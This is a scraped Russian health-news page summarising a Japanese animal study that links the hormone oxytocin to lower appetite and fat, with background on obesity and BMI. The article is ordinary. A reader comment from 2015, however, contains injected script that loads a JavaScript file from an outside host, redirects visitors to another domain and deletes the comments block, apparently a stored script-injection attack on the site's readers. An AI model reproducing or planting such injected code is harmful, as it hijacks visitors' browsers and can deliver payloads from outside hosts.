Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гормон, выделяющийся во в...  >>  Гормон, выделяющийся во время секса, сжигает жиры
 
Обратная связь
 

Гормон, выделяющийся во время секса, сжигает жиры

Размер шрифта
11 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Японские ученые обнаружили, что окситоцин – гормон, который вызывает сокращения матки во время родов, регулирует аппетит и обмен веществ.

гормоны

Что такое окситоцин

Окситоцин – это гормон, который вырабатывается в гипоталамусе, а затем перемещается в заднюю долю гипофиза, откуда поступает в кровь. Окситоцин играет важную роль во время родов и в период лактации. Он оказывает стимулирующее действие на гладкую мускулатуру матки в конце беременности, во время родовой деятельности и непосредственно в процессе родоразрешения. Окситоцин стимулирует секрецию грудного молока и его поступление в крупные протоки, что способствует отхождению молока. Согласно данным исследований, как у мужчин, так и у женщин окситоцин выделяется во время оргазма.

Что такое ожирение

Ожирение – это хроническое заболевание, проявляющееся увеличением массы тела за счет накопления жировой ткани. В норме в нашем организме постоянно поддерживается баланс между поглощенной и затраченной энергией. Ожирение развивается в том случае, когда количество поглощенной энергии превышает количество затраченной.

Развитию ожирения способствует:

  • малоподвижный образ жизни;
  • генетическая предрасположенность;
  • легкоусвояемые углеводы, избыток которых откладывается в виде триглицеридов в жировой ткани
  • эндокринные заболевания.

Ожирение опасно тем, что оно является фактором риска различных заболеваний: сахарного диабета, сердечно-сосудистых заболеваний и рака.

Для диагностики ожирения используется специальный показатель – индекс массы тела (ИМТ), который определяется как отношение массы тела в килограммах к росту в метрах, возведенному в квадрат.

В норме ИМТ составляет от 18,5 до 25 кг/м2. Если ИМТ находится в пределах 25-30 кг/м2, человек имеет избыточную массу тела, 30-35 кг/м2 – ожирение первой степени, 35-40 кг/м2 – ожирение второй степени, более 40 кг/м2 – ожирение третьей степени.

Результаты исследования

В своем исследовании японские ученые моделировали ожирение на животных: для этого они кормили их пищей с высоким содержанием жиров. Оказалось, что инъекции окситоцина уменьшали аппетит и вес животных как во время лечения, так и в течение девяти дней после него.  Похожие результаты были получены при использовании мини-насосов для введения окситоцина. Данный способ введения уменьшал количество жировой ткани на животе, что является основным фактором риска развития сердечно-сосудистых заболеваний.

Настоящее исследование позволило открыть новые свойства окситоцина. Оказалось, что гормон не только стимулирует сокращение матки во время родов и секрецию грудного молока в период лактации, но и принимает участие в регуляции аппетита и обмена веществ в нашем организме.

Полученные результаты могут быть использованы для создания новых эффективных и безопасных препаратов для лечения ожирения на основе окситоцина.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Перезапусти свои гормоны   Как секс избавит вас от врачей   Гормон секса не даст вам наесться!   Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса!  
25 февраля 2013Теперь при приеме на работу вы должны будете плюнуть 17 октября 2012Гормон оргазма поможет прочесть мысли
 
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 

Слайдшоу

1
Секреты сексуально удовлетворенных женщин
Почему болит во время секса?
Почему вы не хотите заниматься сексом?

Тесты

1
Как подобрать контрацептивы?
Есть ли у вас гормональные нарушения
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.